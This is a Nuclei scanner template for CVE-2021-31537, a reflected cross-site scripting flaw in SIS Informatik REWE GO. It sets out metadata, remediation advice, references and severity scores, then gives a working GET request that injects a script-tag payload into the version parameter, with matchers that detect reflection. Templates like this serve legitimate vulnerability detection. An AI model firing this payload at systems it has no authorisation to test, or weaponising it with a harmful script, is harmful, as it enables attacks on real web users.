id: CVE-2021-31537 info: name: SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting author: geeknik severity: medium description: SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being displayed on web pages. reference: - https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ - http://seclists.org/fulldisclosure/2021/May/20 - https://sisinformatik.com/rewe-go/ - https://nvd.nist.gov/vuln/detail/CVE-2021-31537 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-31537 cwe-id: CWE-79 epss-score: 0.00271 epss-percentile: 0.64256 cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sisinformatik product: sis-rewe_go tags: cve,cve2021,xss,seclists,intrusive http: - method: GET path: - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707" matchers-condition: and matchers: - type: word part: body words: - - SIS-REWE condition: and - type: word part: header words: - text/html # digest: 4a0a0047304502201b3737a92f417259322e306a57cd42833bee351cc4838cabc48d20c5d0d330d7022100c95b45198a83fd57891cc9b0de3b8993c97713ae2792fbfbc939f67479572f71:922c64590222798bb761d5b6d8e72950